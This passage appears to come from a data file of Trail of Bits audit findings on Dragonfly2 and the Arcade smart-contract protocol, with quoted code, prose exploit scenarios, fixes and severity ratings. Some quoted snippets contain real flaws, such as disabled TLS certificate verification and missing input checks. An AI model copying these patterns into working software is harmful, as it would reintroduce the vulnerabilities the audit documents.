(Dragonfly2/scheduler/resource/peer.go#435–446) Exploit Scenario A network-level attacker who cannot join a peer-to-peer network performs a Man-in-the-Middle attack on peers. The adversary can do this because peers (partially) communicate over the plaintext HTTP protocol. The attack chains this vulnerability with the one described in TOB-DF2-15 to replace correct files with malicious ones. Unwitting peers use the malicious files. Recommendations Short term, add a configuration option to use HTTPS for these downloads. Long term, audit the rest of the repository for other hard-coded uses of HTTP.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "18. 
Incorrect log message ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "The scheduler service may sometimes output two different logging messages stating two different reasons why a task is being registered as a normal task. The following code is used to register a peer and trigger a seed peer download task. // RegisterPeerTask registers peer and triggers seed peer download task. func (v *V1) RegisterPeerTask(ctx context.Context, req *schedulerv1.PeerTaskRequest) (*schedulerv1.RegisterResult, error) { [skipped] // The task state is TaskStateSucceeded and SizeScope is not invalid. switch sizeScope { case commonv1.SizeScope_EMPTY: [skipped] case commonv1.SizeScope_TINY: // Validate data of direct piece. if !peer.Task.CanReuseDirectPiece() { peer.Log.Warnf(\"register as normal task, because of length of direct piece is %d, content length is %d\", len(task.DirectPiece), task.ContentLength.Load()) break } result, err := v.registerTinyTask(ctx, peer) if err != nil { peer.Log.Warnf(\"register as normal task, because of %s\", err.Error()) break } return result, nil case commonv1.SizeScope_SMALL: result, err := v.registerSmallTask(ctx, peer) if err != nil { peer.Log.Warnf(\"register as normal task, because of %s\", err.Error()) break } return result, nil } result, err := v.registerNormalTask(ctx, peer) if err != nil { peer.Log.Error(err) v.handleRegisterFailure(ctx, peer) return nil, dferrors.New(commonv1.Code_SchedError, err.Error()) } peer.Log.Info(\"register as normal task, because of invalid size scope\") return result, nil } Figure 18.1: Code snippet with incorrect logging (Dragonfly2/scheduler/service/service_v1.go#93–173) Each of the highlighted sets of lines above prints register as normal task, because [reason], before exiting from the switch statement. Then, the task is registered as a normal task. Finally, another message is logged: register as normal task, because of invalid size scope. This means that two different messages may be printed (one as a warning message, one as an informational message) with two contradicting reasons for why the task was registered as a normal task. This does not cause any security problems directly but may lead to difficulties while managing a DragonFly system or debugging DragonFly code. Recommendations Short term, move the peer.Log.Info function call into a default branch in the switch statement so that it is called only when the size scope is invalid.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "3. Manager makes requests to external endpoints with disabled TLS authentication ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "The Manager disables TLS certificate verification in two HTTP clients (figures 3.1 and 3.2). The clients are not configurable, so users have no way to re-enable the verification.
func getAuthToken(ctx context.Context, header http.Header) (string, error) { [skipped] client := &http.Client{ Timeout: defaultHTTPRequesttimeout, Transport: &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, }, } [skipped] } Figure 3.1: getAuthToken function with disabled TLS certificate verification (Dragonfly2/manager/job/preheat.go#261–301) func (p *preheat) getManifests(ctx context.Context, url string, header http.Header) (*http.Response, error) { [skipped] client := &http.Client{ Timeout: defaultHTTPRequesttimeout, Transport: &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, }, } [skipped] } Figure 3.2: getManifests function with disabled TLS certificate verification (Dragonfly2/manager/job/preheat.go#211–233) Exploit Scenario A Manager processes dozens of preheat jobs. An adversary performs a network-level Man-in-the-Middle attack, providing invalid data to the Manager. The Manager preheats with the wrong data, which later causes a denial of service and file integrity problems. Recommendations Short term, make the TLS certificate verification configurable in the getManifests and getAuthToken methods. Preferably, enable the verification by default. Long term, enumerate all HTTP, gRPC, and possibly other clients that use TLS and document their configurable and non-configurable (hard-coded) settings. Ensure that all security-relevant settings are configurable or set to secure defaults. Keep the list up to date with the code.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "4. Incorrect handling of a task structure's usedTraffic field ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "The processPieceFromSource method (figure 4.1) is part of a task processing mechanism. The method writes pieces of data to storage, updating a Task structure along the way. The method does not update the structure's usedTraffic field, because an uninitialized variable n is used as a guard for the AddTraffic method call, instead of the result.Size variable. var n int64 result.Size, err = pt.GetStorage().WritePiece( [skipped] ) result.FinishTime = time.Now().UnixNano() if n > 0 { pt.AddTraffic(uint64(n)) } Figure 4.1: Part of the processPieceFromSource method with a bug (Dragonfly2/client/daemon/peer/piece_manager.go#264–290) Exploit Scenario A task is processed by a peer. The usedTraffic metadata is not updated during the processing. Rate limiting is incorrectly applied, leading to a denial-of-service condition for the peer. Recommendations Short term, replace the n variable with the result.Size variable in the processPieceFromSource method. Long term, add tests for checking if all Task structure fields are correctly updated during task processing. Add similar tests for other structures.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "19. Usage of architecture-dependent int type ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "DragonFly2 uses the int and uint numeric types in its Go codebase. These types' bit sizes are either 32 or 64 bits, depending on the hardware where the code is executed. Because of that, DragonFly2 components running on different architectures may behave differently. These discrepancies in behavior may lead to unexpected crashes of some components or incorrect data handling.
For example, the handlePeerSuccess method casts the peer.Task.ContentLength variable to the int type. Schedulers running on different machines may therefore behave differently. if len(data) != int(peer.Task.ContentLength.Load()) { peer.Log.Errorf(\"download tiny task length of data is %d, task content length is %d\", len(data), peer.Task.ContentLength.Load()) return } Figure 19.1: example use of architecture-dependent int type (Dragonfly2/scheduler/service/service_v1.go#1240–1243) Recommendations Short term, use a fixed bit size for all integer values. Alternatively, ensure that using the int type will not impact any computing where results must agree on all participants' computers.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "2. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "Arcade has enabled optional compiler optimizations in Solidity. According to a November 2018 audit of the Solidity compiler, the optional optimizations may not be safe. optimizer: { enabled: optimizerEnabled, runs: 200, }, Figure 2.1: The solc optimizer settings in arcade-protocol/hardhat.config.ts High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018; the fix for this bug was not reported in the Solidity changelog. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. Another bug due to the incorrect caching of Keccak-256 was reported. It is likely that there are latent bugs related to optimization and that future optimizations will introduce new bugs. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the Arcade contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: High" + ] + }, + { + "title": "3. callApprove does not follow approval best practices ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The AssetVault.callApprove function has undocumented behaviors and lacks the increase/decrease approval functions, which might impede third-party integrations. A well-known race condition exists in the ERC-20 approval mechanism. The race condition is enabled if a user or smart contract calls approve a second time on a spender that has already been allowed. If the spender sees the transaction containing the call before it has been mined, they can call transferFrom to transfer the previous value and then still receive authorization to transfer the new value. To mitigate this, AssetVault uses the SafeERC20.safeApprove function, which will revert if the allowance is updated from nonzero to nonzero.
However, this behavior is not documented, and it might break the protocol's integration with third-party contracts or off-chain components. function callApprove( address token, address spender, uint256 amount ) external override onlyAllowedCallers onlyWithdrawDisabled nonReentrant { if (!CallWhitelistApprovals(whitelist).isApproved(token, spender)) { revert AV_NonWhitelistedApproval(token, spender); } // Do approval IERC20(token).safeApprove(spender, amount); emit Approve(msg.sender, token, spender, amount); } Figure 3.1: The callApprove function in arcade-protocol/contracts/vault/AssetVault.sol /** * @dev Deprecated. This function has issues similar to the ones found in * {IERC20-approve}, and its usage is discouraged. * * Whenever possible, use {safeIncreaseAllowance} and * {safeDecreaseAllowance} instead. */ function safeApprove( IERC20 token, address spender, uint256 value ) internal { // safeApprove should only be called when setting an initial allowance, // or when resetting it to zero. To increase and decrease it, use // 'safeIncreaseAllowance' and 'safeDecreaseAllowance' require( (value == 0) || (token.allowance(address(this), spender) == 0), \"SafeERC20: approve from non-zero to non-zero allowance\" ); _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value)); } Figure 3.2: The safeApprove function in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol An alternative way to mitigate the ERC-20 race condition is to use the increaseAllowance and decreaseAllowance functions to safely update allowances. These functions are widely used by the ecosystem and allow users to update approvals with less ambiguity. function safeIncreaseAllowance( IERC20 token, address spender, uint256 value ) internal { uint256 newAllowance = token.allowance(address(this), spender) + value; _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, newAllowance)); } function safeDecreaseAllowance( IERC20 token, address spender, uint256 value ) internal { unchecked { uint256 oldAllowance = token.allowance(address(this), spender); require(oldAllowance >= value, \"SafeERC20: decreased allowance below zero\"); uint256 newAllowance = oldAllowance - value; _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, newAllowance)); } } Figure 3.3: The safeIncreaseAllowance and safeDecreaseAllowance functions in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol Exploit Scenario Alice, the owner of an asset vault, sets up an approval of 1,000 for her external contract by calling callApprove. She later decides to update the approval amount to 1,500 and again calls callApprove. This second call reverts, which she did not expect. Recommendations Short term, take one of the following actions: Update the documentation to make it clear to users and other integrating smart contract developers that two transactions are needed to update allowances. Add two new functions in the AssetVault contract: callIncreaseAllowance and callDecreaseAllowance, which internally call SafeERC20.safeIncreaseAllowance and SafeERC20.safeDecreaseAllowance, respectively (a sketch follows).
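A minimal sketch of the second option (ours, not Arcade's code; it assumes the same modifiers, whitelist check, and Approve event used by callApprove in figure 3.1):
function callIncreaseAllowance( address token, address spender, uint256 amount ) external onlyAllowedCallers onlyWithdrawDisabled nonReentrant {
    if (!CallWhitelistApprovals(whitelist).isApproved(token, spender)) {
        revert AV_NonWhitelistedApproval(token, spender);
    }
    // Raises the existing allowance without the nonzero-to-nonzero revert.
    IERC20(token).safeIncreaseAllowance(spender, amount);
    emit Approve(msg.sender, token, spender, amount);
}
// callDecreaseAllowance would mirror this using safeDecreaseAllowance.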
Long term, when using external libraries/contracts, always ensure that they are being used correctly and that edge cases are explained in the documentation.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Medium" + ] + }, + { + "title": "4. Risk of confusing events due to missing checks in whitelist contracts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The CallWhitelist contract's add and remove functions do not check whether the given call has been registered in the whitelist. As a result, add could be used to register calls that have already been registered, and remove could be used to remove calls that have never been registered; these types of calls would still emit events. For example, invoking remove with a call that is not in the whitelist would emit a CallRemoved event even though no call was removed. Such an event could confuse off-chain monitoring systems, or at least make it more difficult to retrace what happened by looking at the emitted event. function add(address callee, bytes4 selector) external override onlyOwner { whitelist[callee][selector] = true; emit CallAdded(msg.sender, callee, selector); } Figure 4.1: The add function in arcade-protocol/contracts/vault/CallWhitelist.sol function remove(address callee, bytes4 selector) external override onlyOwner { whitelist[callee][selector] = false; emit CallRemoved(msg.sender, callee, selector); } Figure 4.2: The remove function in arcade-protocol/contracts/vault/CallWhitelist.sol A similar problem exists in the CallWhitelistDelegation.setRegistry function. This function can be called to set the registry address to the current registry address. In that case, the emitted RegistryChanged event would be confusing because nothing would have actually changed. function setRegistry(address _registry) external onlyOwner { registry = IDelegationRegistry(_registry); emit RegistryChanged(msg.sender, _registry); } Figure 4.3: The setRegistry function in arcade-protocol/contracts/vault/CallWhitelistDelegation.sol Arcade has explained that the owner of the whitelist contracts in Arcade V3 will be a (set of) governance contract(s), so it is unlikely that this issue will happen. However, it is possible, and it could be prevented by more validation. Exploit Scenario No calls have yet been added to the whitelist in CallWhitelist. Through the governance system, a proposal to remove a call with the address 0x1 and the selector 0x12345678 is approved. The proposal is executed, and CallWhitelist.remove is called. The transaction succeeds, and a CallRemoved event is emitted, even though the removed call was never in the whitelist in the first place. Recommendations Short term, add validation to the add, remove, and setRegistry functions. For the add function, it should ensure that the given call is not already in the whitelist. For the remove function, it should ensure that the call is currently in the whitelist. For the setRegistry function, it should ensure that the new registry address is not the current registry address. Adding this validation will prevent confusing events from being emitted and ease the tracing of events in the whitelist over time (a sketch of this validation follows below). Long term, when dealing with function arguments, always ensure that all inputs are validated as tightly as possible and that the subsequent emitted events are meaningful.
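For illustration, a sketch of the suggested validation for add and remove (ours; the revert strings are assumptions, and custom errors per the project's conventions would work equally well):
function add(address callee, bytes4 selector) external override onlyOwner {
    // Revert when the call is already whitelisted, so CallAdded is emitted
    // only when state actually changes.
    require(!whitelist[callee][selector], \"already whitelisted\");
    whitelist[callee][selector] = true;
    emit CallAdded(msg.sender, callee, selector);
}
function remove(address callee, bytes4 selector) external override onlyOwner {
    require(whitelist[callee][selector], \"not whitelisted\");
    whitelist[callee][selector] = false;
    emit CallRemoved(msg.sender, callee, selector);
}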
Additionally, consider setting up an off-chain monitoring system that will track important system events. Such a system will provide an overview of the events that occur in the contracts and will be useful when incidents occur.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "5. Missing checks of _exists() return value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The ERC-721 _exists() function returns a Boolean value that indicates whether a token with the specified tokenId exists. In two instances in Arcade's codebase, the function is called but its return value is not checked, bypassing the intended result of the existence check. In particular, in the PromissoryNote.tokenURI() and VaultFactory.tokenURI() functions, _exists() is called before the URI for the tokenId is returned, but its return value is not checked. If the given NFT does not exist, the URI returned by the tokenURI() function will be incorrect, but this error will not be detected due to the missing return value check on _exists(). function tokenURI(uint256 tokenId) public view override(INFTWithDescriptor, ERC721) returns (string memory) { _exists(tokenId); return descriptor.tokenURI(address(this), tokenId); } Figure 5.1: The tokenURI function in arcade-protocol/contracts/PromissoryNote.sol function tokenURI(address, uint256 tokenId) external view override returns (string memory) { return bytes(baseURI).length > 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : \"\"; } Figure 5.2: The tokenURI function in arcade-protocol/contracts/nft/BaseURIDescriptor.sol Exploit Scenario Bob, a developer of a front-end blockchain application that interacts with the Arcade contracts, develops a page that lists users' promissory notes and vaults with their respective URIs. He accidentally passes a nonexistent tokenId to tokenURI(), causing his application to show an incorrect or incomplete URI. Recommendations Short term, add a check for the _exists() function's return value to both of the tokenURI() functions to prevent them from returning an incomplete URI for nonexistent tokens. Long term, add new test cases to verify the expected return values of tokenURI() in all contracts that use it, with valid and invalid tokens as arguments.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "6. Incorrect deployers in integration tests ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The fixture deployment function in the provided integration tests uses different signers for deploying the Arcade contracts before performing the tests. All Arcade contracts are meant to be deployed by the protocol team, except for vaults, which are deployed by users using the VaultFactory contract. However, in the fixture deployment function, some contracts are deployed from the borrower account instead of the admin account. Some examples are shown in figure 6.1; however, there are other instances in which contracts are not deployed from the admin account.
const signers: SignerWithAddress[] = await ethers.getSigners(); const [borrower, lender, admin] = signers; const whitelist = await deploy(\"CallWhitelist\", signers[0], []); const vaultTemplate = await deploy(\"AssetVault\", signers[0], []); const feeController = await deploy(\"FeeController\", admin, []); const descriptor = await deploy(\"BaseURIDescriptor\", signers[0], [BASE_URI]) const vaultFactory = await deploy(\"VaultFactory\", signers[0], [vaultTemplate.address, whitelist.address, feeController.address, descriptor.address]); Figure 6.1: A snippet of the tests in arcade-protocol/test/Integration.ts Exploit Scenario Alice, a developer on the Arcade team, adds a new permissioned feature to the protocol. She adds the relevant integration tests for her feature, and all tests pass. However, because the deployer for the test contracts was not the admin account, those tests should have failed, and the contracts are deployed to the network with a bug. Recommendations Short term, correct all of the instances of incorrect deployers for the contracts in the integration tests file. Long term, add additional test cases to ensure that the account permissions in all deployed contracts are correct.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "7. Risk of out-of-gas revert due to use of transfer() in claimFees ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The VaultFactory.claimFees function uses the low-level transfer() operation to move the collected ETH fees to another arbitrary address. The transfer() operation forwards only 2,300 units of gas. As a result, if the recipient is a contract with logic inside the receive() function, which would use extra gas, the operation will probably (depending on the gas cost) fail due to an out-of-gas revert. function claimFees(address to) external onlyRole(FEE_CLAIMER_ROLE) { uint256 balance = address(this).balance; payable(to).transfer(balance); emit ClaimFees(to, balance); } Figure 7.1: The claimFees function in arcade-protocol/contracts/vault/VaultFactory.sol The Arcade team has explained that the recipient will be a treasury contract with no logic inside the receive() function, meaning the current use of transfer() will not pose any problems. However, if at some point the recipient does contain logic inside the receive() function, then claimFees will likely revert and the contract will not be able to claim the funds. Note, however, that the fees could be claimed by another address (i.e., the fees will not be stuck). The withdrawETH function in the AssetVault contract uses Address.sendValue instead of transfer(). function withdrawETH(address to) external override onlyOwner onlyWithdrawEnabled nonReentrant { // perform transfer uint256 balance = address(this).balance; payable(to).sendValue(balance); emit WithdrawETH(msg.sender, to, balance); } Figure 7.2: The withdrawETH function in arcade-protocol/contracts/vault/AssetVault.sol Address.sendValue internally uses the call() operation, passing along all of the remaining gas, so this function could be a good candidate to replace use of transfer() in claimFees. However, doing so could introduce other risks like reentrancy attacks.
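For reference, a sketch of claimFees using Address.sendValue (ours, not Arcade's code; it assumes the contract imports OpenZeppelin's Address library with using Address for address payable, as AssetVault already does):
function claimFees(address to) external onlyRole(FEE_CLAIMER_ROLE) {
    uint256 balance = address(this).balance;
    // sendValue forwards all remaining gas rather than transfer()'s 2,300 stipend.
    payable(to).sendValue(balance);
    emit ClaimFees(to, balance);
}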
Note that neither the withdrawETH function nor the claimFees function is currently at risk of reentrancy attacks. Exploit Scenario Alice, a developer on the Arcade team, deploys a new treasury contract that contains an updated receive() function that also writes the received ETH amount into a storage array in the treasury contract. Bob, whose account has the FEE_CLAIMER_ROLE role in the VaultFactory contract, calls claimFees with the newly deployed treasury contract as the recipient. The transaction fails because the write to storage exceeds the 2,300 units of gas passed along. Recommendations Short term, consider replacing the claimFees function's use of transfer() with Address.sendValue; weigh the risk of possibly introducing vulnerabilities like reentrancy attacks against the benefit of being able to one day add logic in the fee recipient's receive() function. If the decision is to have claimFees continue to use transfer(), update the NatSpec comments for the function so that readers will be aware of the 2,300 gas limit on the fee recipient. Long term, when deciding between using the low-level transfer() and call() operations, consider how malicious smart contracts may be able to exploit the lack of limits on the gas available in the recipient function. Additionally, consider the likelihood that the recipient will be a smart wallet or multisig (or other smart contract) with logic inside the receive() function, as the 2,300 gas from transfer() might not be sufficient for those recipients.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "8. Risk of lost funds due to lack of zero-address check in functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The VaultFactory.claimFees (figure 8.1), RepaymentController.redeemNote (figure 8.2), LoanCore.withdraw, and LoanCore.withdrawProtocolFees functions are all missing a check to ensure that the to argument does not equal the zero address. As a result, these functions could transfer funds to the zero address. function claimFees(address to) external onlyRole(FEE_CLAIMER_ROLE) { uint256 balance = address(this).balance; payable(to).transfer(balance); emit ClaimFees(to, balance); } Figure 8.1: The claimFees function in arcade-protocol/contracts/vault/VaultFactory.sol function redeemNote(uint256 loanId, address to) external override { LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId); if (data.state != LoanLibrary.LoanState.Repaid) revert RC_InvalidState(data.state); address lender = lenderNote.ownerOf(loanId); if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender); uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / BASIS_POINTS_DENOMINATOR; loanCore.redeemNote(loanId, redeemFee, to); } Figure 8.2: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol Exploit Scenario A script that is used to periodically withdraw the protocol fees (calling LoanCore.withdrawProtocolFees) is updated. Due to a mistake, the to argument is left uninitialized. The script is executed, and the to argument defaults to the zero address, causing withdrawProtocolFees to transfer the protocol fees to the zero address.
Recommendations Short term, add a check to verify that to does not equal the zero address to the following functions: VaultFactory.claimFees RepaymentController.redeemNote LoanCore.withdraw LoanCore.withdrawProtocolFees Long term, use the Slither static analyzer to catch common issues such as this one. Consider integrating a Slither scan into the project's CI pipeline, pre-commit hooks, or build scripts.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "9. The maximum value for FL_09 is not set by FeeController ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The FeeController constructor initializes all of the maximum values for the fees defined in the FeeLookups contract except for FL_09 (LENDER_REDEEM_FEE). Because the maximum value is not set, it is possible to set any amount, with no upper bound, for that particular fee. The lender's redeem fee is used in RepaymentController's redeemNote function to calculate the fee paid by the lender to the protocol in order to receive their funds back. If the protocol team accidentally sets the fee to 100%, all of the users' funds to be redeemed would instead be used to pay the protocol. constructor() { /// @dev Vault mint fee - gross maxFees[FL_01] = 1 ether; /// @dev Origination fees - bps maxFees[FL_02] = 10_00; maxFees[FL_03] = 10_00; /// @dev Rollover fees - bps maxFees[FL_04] = 20_00; maxFees[FL_05] = 20_00; /// @dev Loan closure fees - bps maxFees[FL_06] = 10_00; maxFees[FL_07] = 50_00; maxFees[FL_08] = 10_00; } Figure 9.1: The constructor in arcade-protocol/contracts/FeeController.sol function redeemNote(uint256 loanId, address to) external override { LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId); if (data.state != LoanLibrary.LoanState.Repaid) revert RC_InvalidState(data.state); address lender = lenderNote.ownerOf(loanId); if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender); uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / BASIS_POINTS_DENOMINATOR; loanCore.redeemNote(loanId, redeemFee, to); } Figure 9.2: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol Exploit Scenario Charlie, a member of the Arcade protocol team, has access to the privileged account that can change the protocol fees. He wants to set LENDER_REDEEM_FEE to 5%, but he accidentally types a 0 and sets it to 50%. Users can now lose half of their funds to the new protocol fee, causing distress and lack of trust in the team. Recommendations Short term, set a maximum boundary for the FL_09 fee in FeeController's constructor. Long term, improve the test suite to ensure that all fee-changing functions test for out-of-bounds values for all fees, not just FL_02.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "10. Fees can be changed while a loan is active ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "All fees in the protocol are calculated using the current fees, as informed by the FeeController contract.
However, fees can be changed by the team at any time, so the effective rollover and closure fees that the users will pay can change once their loans are already initialized; therefore, these fees are impossible to know in advance. For example, in the code shown in figure 10.1, the LENDER_INTEREST_FEE and LENDER_PRINCIPAL_FEE values are read when a loan is about to be repaid, but these values can be different from the values the user agreed to when the loan was initialized. The same can happen in OriginationController and other functions in RepaymentController. function _prepareRepay(uint256 loanId) internal view returns (uint256 amountFromBorrower, uint256 amountToLender) { LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); if (data.state == LoanLibrary.LoanState.DUMMY_DO_NOT_USE) revert RC_CannotDereference(loanId); if (data.state != LoanLibrary.LoanState.Active) revert RC_InvalidState(data.state); LoanLibrary.LoanTerms memory terms = data.terms; uint256 interest = getInterestAmount(terms.principal, terms.proratedInterestRate); uint256 interestFee = (interest * feeController.get(FL_07)) / BASIS_POINTS_DENOMINATOR; uint256 principalFee = (terms.principal * feeController.get(FL_08)) / BASIS_POINTS_DENOMINATOR; amountFromBorrower = terms.principal + interest; amountToLender = amountFromBorrower - interestFee - principalFee; } Figure 10.1: The _prepareRepay function in arcade-protocol/contracts/RepaymentController.sol Exploit Scenario Lucy, the lender, and Bob, the borrower, agree on the current loan conditions and fees at a certain point in time. Some weeks later, when the time comes to repay the loan, they learn that the protocol team decided to change the fees while their loan was active. Lucy's earnings are now different from what she expected. Recommendations Short term, consider storing (for example, in the LoanTerms structure) the fee values that both counterparties agree on when a loan is initialized, and use those local values for the full lifetime of the loan. Long term, document all of the conditions that are agreed on by the counterparties and that should be constant during the lifetime of the loan, and make sure they are preserved. Add a specific integration or fuzzing test for these conditions.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "11. Asset vault nesting can lead to loss of assets ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "Allowing asset vaults to be nested (e.g., vault A is owned by vault B, and vault B is owned by vault X, etc.) could result in a situation in which multiple asset vaults own each other. This would result in a deadlock preventing assets in the affected asset vaults from ever being withdrawn again. Asset vaults are designed to hold different types of assets, including ERC-721 tokens. The ownership of an asset vault is tracked by an accompanying ERC-721 token that is minted (figure 11.1) when the asset vault is deployed through the VaultFactory contract.
function initializeBundle(address to) external payable override returns (uint256) { uint256 mintFee = feeController.get(FL_01); if (msg.value < mintFee) revert VF_InsufficientMintFee(msg.value, mintFee); address vault = _create(); _mint(to, uint256(uint160(vault))); emit VaultCreated(vault, to); if (msg.value > mintFee) payable(msg.sender).transfer(msg.value - mintFee); return uint256(uint160(vault)); } Figure 11.1: The initializeBundle function in arcade-protocol/contracts/vault/VaultFactory.sol To add an ERC-721 asset to an asset vault, it needs to be transferred to the asset vault's address. Because the ownership of an asset vault is tracked by an ERC-721 token, it is possible to transfer the ownership of an asset vault to another asset vault by simply transferring the ERC-721 token representing vault ownership. To withdraw ERC-721 tokens from an asset vault, the owner (the holder of the asset vault's ERC-721 token) needs to enable withdrawals (using the enableWithdraw function) and then call the withdrawERC721 (or withdrawBatch) function. function enableWithdraw() external override onlyOwner onlyWithdrawDisabled { withdrawEnabled = true; emit WithdrawEnabled(msg.sender); } Figure 11.2: The enableWithdraw function in arcade-protocol/contracts/vault/AssetVault.sol function withdrawERC721( address token, uint256 tokenId, address to ) external override onlyOwner onlyWithdrawEnabled { _withdrawERC721(token, tokenId, to); } Figure 11.3: The withdrawERC721 function in arcade-protocol/contracts/vault/AssetVault.sol Only the owner of an asset vault can enable and perform withdrawals. Therefore, if two (or more) vaults own each other, it would be impossible for a user to enable or perform withdrawals on the affected vaults, permanently locking all assets (ERC-721, ERC-1155, ERC-20, ETH) within them. The severity of the issue depends on the UI, which was out of scope for this review. If the UI does not prevent vaults from owning each other, the severity of this issue is higher. In terms of likelihood, this issue would require a user to make a mistake (although a mistake that is far more likely than the transfer of tokens to a random address) and would require the UI to fail to detect and prevent or warn the user from making such a mistake. We therefore rated the difficulty of this issue as high. Exploit Scenario Alice decides to borrow USDC by putting up some of her NFTs as collateral: 1. Alice uses the UI to create an asset vault (vault A) and transfers five of her CryptoPunks to the asset vault. 2. The UI shows that Alice has another existing vault (vault X), which contains two Bored Apes. She wants to use these two vaults together to borrow a higher amount of USDC. She clicks on vault A and selects the Add Asset option. 3. The UI shows a list of assets that Alice owns, including the ERC-721 token that represents ownership of vault X. Alice clicks on Add, the transaction succeeds, and the vault X NFT is transferred to vault A. Vault X is now owned by vault A. 4. Alice decides to add another Bored Ape NFT that she owns to vault X. She opens the vault X page and clicks on Add Assets, and the list of assets that she can add shows the ERC-721 token that represents ownership of vault A. 5. Alice is confused and wonders if adding vault X to vault A worked (step 3). She decides to add vault A to vault X instead.
The transaction succeeds, and now vault A owns vault X and vice versa. Alice is now unable to withdraw any of the assets from either vault. Recommendations Short term, take one of the following actions: Disallow the nesting of asset vaults. That is, prevent users from being able to transfer ownership of an asset vault to another asset vault. This would prevent the issue altogether. If allowing asset vaults to be nested is a desired feature, update the UI to prevent two or more asset vaults from owning each other (if it does not already do so). Also, update the documentation so that other integrating smart contract protocols are aware of the issue. Long term, when dealing with the nesting of assets, consider edge cases and write extensive tests that ensure these edge cases are handled correctly and that users do not lose access to their assets. Other than unit tests, we recommend writing invariants and testing them using property-based testing with Echidna.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "12. Risk of locked assets due to use of _mint instead of _safeMint ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The asset vault and promissory note ERC-721 tokens are minted via the _mint function rather than the _safeMint function. The _safeMint function includes a necessary safety check that validates a recipient contract's ability to receive and handle ERC-721 tokens. Without this safeguard, tokens can inadvertently be sent to an incompatible contract, causing them, and any assets they hold, to become irretrievable. function initializeBundle(address to) external payable override returns (uint256) { uint256 mintFee = feeController.get(FL_01); if (msg.value < mintFee) revert VF_InsufficientMintFee(msg.value, mintFee); address vault = _create(); _mint(to, uint256(uint160(vault))); emit VaultCreated(vault, to); if (msg.value > mintFee) payable(msg.sender).transfer(msg.value - mintFee); return uint256(uint160(vault)); } Figure 12.1: The initializeBundle function in arcade-protocol/contracts/vault/VaultFactory.sol function mint(address to, uint256 loanId) external override returns (uint256) { if (!hasRole(MINT_BURN_ROLE, msg.sender)) revert 